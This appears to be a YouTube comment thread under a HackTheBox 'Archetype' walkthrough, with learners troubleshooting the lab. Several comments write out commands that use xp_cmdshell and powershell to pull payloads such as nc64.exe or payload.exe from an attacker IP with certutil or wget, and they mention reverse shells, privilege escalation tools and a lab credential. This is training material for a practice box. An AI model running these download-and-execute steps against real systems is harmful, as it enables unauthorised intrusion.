Your videos are so damn good man. I would pay for this content. Between the Practical Ethical Hacking course from TCM Security, and watching and taking notes during these videos, I have learned soo much. Thank you so much for creating such great content and doing it in a way that is approachable to people learning about this. You are an amazing resource in this community. I wish I lived overseas so I could buy you a pint!
Just finished this one. I was surprised to see that the intended solution was to spawn a reverse shell! When I got access to the MS SQL server I noticed I could still run dir with the xp_cmdshell so I dir'ed my way through the whole thing 😂
This is my first run through of this box. Having a hard time understanding the binary download and install, the reverse shell. I am following the walk-through PDF and nowhere does it mention meta sploit but you are using it in your video. Do you have another video where you follow the walkthrough PDFs?
Hey, I don't have another video of it unfortunately.. I probably have other videos that do the same / similar, but I've lost track at this stage. The beauty of hacking is there's almost always a variety of tools/techniques you can use to achieve the same objective 😉
Following the steps to a T evil-winrm I get --- Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "{TUN0_IP}" port 5985 ({TUN0_IP}:5985) Error: Exiting with code 1 Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "{TUN0_IP}" port 5985 ({TUN0_IP}:5985) Error: Exiting with code 1 How do I get past this?
Many thanks. Wasn't sure how to use the SQL commands but your video was ridiculously helpful again. I knew *what* I wanted to do, just wasn't sure how! Anyway, wget wouldn't work for me using PWNBOX but "certutil -urlcache -f *IP:port*/file.exe file.exe" did. In case anyone has any problems trying to chain wget in the powershell commands. I found the password myself also but it wasn't listed same as you, it was way above I actually stopped following once I got my files uploaded as you'd helped me enough. Many thanks once again and I expect I'll be saying this again as I progress and find myself stuck 👍🏻👍🏻👍🏻
Hi Mate... Hope you are doing good... You have done a real hard work to customize and categorize all the payloads... If possible... can you share the Payloads which you have categorized... it help us to explore more information by pointing to the right payloads... Hope you got my point... Thanks in Advance...😊
just a heads up wget wasn't working for me on the host machine I tried with: xp_cmdshell "powershell -c cd C:\Users\Public; certutil -urlcache -f IP:PORT/payload.exe payload.exe and that was buggy as well
Thank you very much for the walkthrough. I have learnt so much! Please keep on doing the wonderful work. I would like to ask some noob questions: Why can't we login the administrator with mssqlclient but be able to login with psexec or evil-winrm? They are all connecting to port 1433. I cannot understand the difference. When I tried to use psexec to login sql_svc, it showed the smb files stating not writable. This confused me with smbclient.
Thank you 🙏🥰 There are some differences with the ports, e.g. mssql = 1433 psexec = 135, 445 (SMB) winrm = 5985, 5986 As for why we can't login as administrator with mssqlclient, a couple of possibilities come to mind; - depending on the config, mssql may or *may not* use windows authentication (Admin password may be different) - there could be some config options preventing admin from logging in Finally, the SMB with sql_svc.. Presumably permissions are configured to prevent that user from writing to shares.
@@_CryptoCat Thank you very much for the information! Given the configuration of the system is unknown, can you give a bit hints of how do you identify which tools to use in a more realistic hacking situation? Because without hints, I would try logging in with smbclient or mssqlclient but not psexec and going nowhere. Sorry for asking a very broad question.
You'll pick up things to remember as you go but when you run out things to try, just crawl the web looking for info about the ports/services you've identified. HackTricks is a good place to start (go through all the steps for each open port/service) and for windows: book.hacktricks.xyz/windows-hardening/active-directory-methodology. Look for "OSCP cheatsheets", e.g. github.com/oncybersec/oscp-enumeration-cheat-sheet, liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html etc
Just ran through this recently, and WinPeas did not return the file containing the admin password as demonstrated. The file didn't exist on the system for some reason. I had to use RoguePotato to get to the admin flag. Just a heads up in case someone hits the same wall I did
Btw guys i couldnt upload the Payload fiel to the target , so i saw a comment and then opened the Python webserver again but with port 80 this time and this time it worked
What amazing waikthrough. i love the way you teach us. I want to ask you where you got all this Vulnerability payload and script, any GitHub repository? Please share!
I do be the trying. Been on this for a week now cause psexec nor meterpreter processes are working because the SQL terminal just seems to hang. Webup is showing the wget success code -200 but that's about as far as I'm getting into the process (winPEAS and payload.exe show length of 0 when use -c cd C:/Users/Public; dir). Can see the file, but it looks garb Not quite sure where these issues lie yet.
Hi mate! Firstly, check if the VPN console output hints at any issues. Also, make sure you can see your VPN IP when you run "ifconfig". If that's all good, a few things you could try: - Restart VPN - Restart VM - Regenerate VPN connection pack - Try a different box (see if it's machine specific) - Check firewall isn't blocking Otherwise, I would check the HTB forum/discord or reach out to tech support. Good luck! 🤞
At 8:00 Impacket comes preinstalled( or apt install impacket) so you don’t have to go through all of this Simply do impacket-mssqlclinet -S host -u user
I think I have a solution... after you run the enable_xp_cmdshell did you run RECONFIGURE to install? After that I struggled to connect my http server to metasploit but released I had been using my actual IP address instead of the openVPN one I am connected to for HTB. Hope this helps. @CryptoCat Love the vids bro, makes such a nice change to an American accent :')
I can't remember these machines too well but check out this thread on the HTB forum, maybe your answer will be in here 🙂 forum.hackthebox.com/t/starting-point-login-failed-for-user-archetype-guest/2667
For anyone with similar issues, I think think the solution here is you have to escape the \ character. so it should be ARCHETYPE/\sql_svc:M3g4c0rp123@{IP ADDRESS}
Appreciate all that you do! Can you please identify how you acquired all of the scripts located at 13:17. Not "payloadsallthethings" but the items located in your "scripts" folder. Thank you!
@@_CryptoCat Thank you! As often stated "I don't know what I don't know". Just wanted to make sure that I wasn't missing something somewhere. Is it possible to post the contents of the scripts folder on your GitHub? I think it would be very helpful for those starting out...which I assume is the majority of your audience.
Not for HTB but sometimes I do write-ups to go along with videos for CTF challs: github.com/Crypto-Cat/CTF. For HTB specifically, you can check the official PDF walkthrough that comes with the starting point machines 😉
Hey im having trouble with the wget i tried different ways to download too but i get the 200 code but after a long while on the windows server it just gives me a time out without actually downloading the file. when i dir it has 0 bytes
Oh mister holy hackerman. What do i do when i cant transfer the payload because wget says it doesn't exist? On my listener it shows a message that the server used the get command error 404 file not found. What did i do wrong? I followed your video exacly. :(
OK so wget has successfully made a request for the payload to your local web server. If you are getting 404 file not found, probably the payload name is incorrect or you don't have the payload in the same directory that you started the python HTTP server. Check that and let me know if you don't get it 🙂
@@_CryptoCat That did the trick. I tested to see if the filename was wrong but i didn't know that the python server needed to be in the same directory as the file. I assumed that the thing in msfconsole was the one sending and the python server was just listening to see any error codes.
you should run mssqlclient.py from your machine e.g. kali/parrot. in case you don't have the script, you can install with "python3 -m pip install impacket", more details here github.com/SecureAuthCorp/impacket
at 28:17 I got the same error but i dont know where the meterpreter shell is located for me because I dont have your scripts folder. my scripts are all in their default folders for kali. So im not able to upload winpeasx64.exe because i dont know the directory on my local host for it. Happen to have any ideas by chance? Thank You!
Hi mate, you can try and search for winpeas like "locate winpeas". I don't think it comes with kali though so probably need to download: github.com/carlospolop/PEASS-ng/tree/master/winPEAS
@CryptoCat oh sorry. I found the path to it but the upload command with the correct path doesn't yield a directory with meterpreter. For me it's /home/kali/usr/share/winpeas/ However that gives the same error when I try the file path
xp_cmdshell "powershell -c cd C:/Users/Public/Downloads; wget 10.10.14.54/nc64.exe -outfile nc64.exe" error 400 file not found help I've tried everything I already put the file everywhere and it doesn't send the file to the other side, it always gives the same error omg
File not found sounds to me like it's not finding "nc64.exe" on your 10.10.14.54 server.. Do you have a web server running in the same directory as the nc64.exe file?